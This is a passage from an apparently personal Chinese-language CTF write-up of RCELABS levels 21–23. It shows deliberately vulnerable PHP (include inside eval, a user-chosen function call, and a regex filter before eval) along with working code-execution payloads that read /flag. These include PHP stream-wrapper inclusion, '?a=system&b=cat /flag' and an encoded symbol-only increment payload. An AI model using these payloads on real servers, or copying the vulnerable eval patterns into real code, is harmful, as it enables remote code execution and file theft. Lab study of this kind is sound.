然后蚁剑连webshell(为什么我的蚁剑就是超时啊西巴)

翻到flag

RCELABS-21

文件包含RCE

1
2
3
4
5
6
7
8
9
10
11
function helloctf($code){
    $code = "include(".$code.");";
    echo "Your includeCode : ".$code;
    eval($code);
}

isset($_POST['c']) ? helloctf($_POST['c']) : '';

highlight_file(__FILE__);

?>

支持远程文件包含

1
c="/flag"#直接包含flag

PHP伪协议

1
c='php://filter/convert.base64-encode/resource=/flag'

data伪协议

1
c="data://text/plain,<?php readfile('/flag');"

RCELABS-22

1
2
3
4
5
isset($_GET['a'])&&isset($_GET['b']) ? $_GET['a']($_GET['b']) : null;

highlight_file(__FILE__);

?>

PHP特性动态调用,a作为函数名b作为变量名

1
?a=system&b=cat /flag

RCELABS-23

1
2
3
4
5
6
7
8
9
10
11
12
highlight_file(__FILE__);

isset($_POST['code']) ? $code = $_POST['code'] : $code = null;

if(preg_match("/[a-zA-Z0-9@#%^&*:{}\-<\?>\"|`~\\\\]/", $code)){
    die("WAF!");
}else{
    echo "Your Payload's Length : ".strlen($code)."<br>";
    eval($code);
}

?>

PHP 特性 - 自增

1
2
code=%24_%3D(_%2F_._)%5B''%3D%3D'_'%5D%3B%24_%2B%2B%3B%24__%20%3D%20%24_%2B%2B%3B%24__%20%3D%20%24_.%24__%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24__%20%3D%20%24__.%24_%2B%2B.%24_%2B%2B%3B%24_%20%3D%20%24__%3B%24__%20%3D'_'%3B%24__.%3D%24_%3B%24%24__%5B__%5D(%24%24__%5B_%5D)%3B
&__=system&_=cat /flag

还没搞懂这个先贴payload(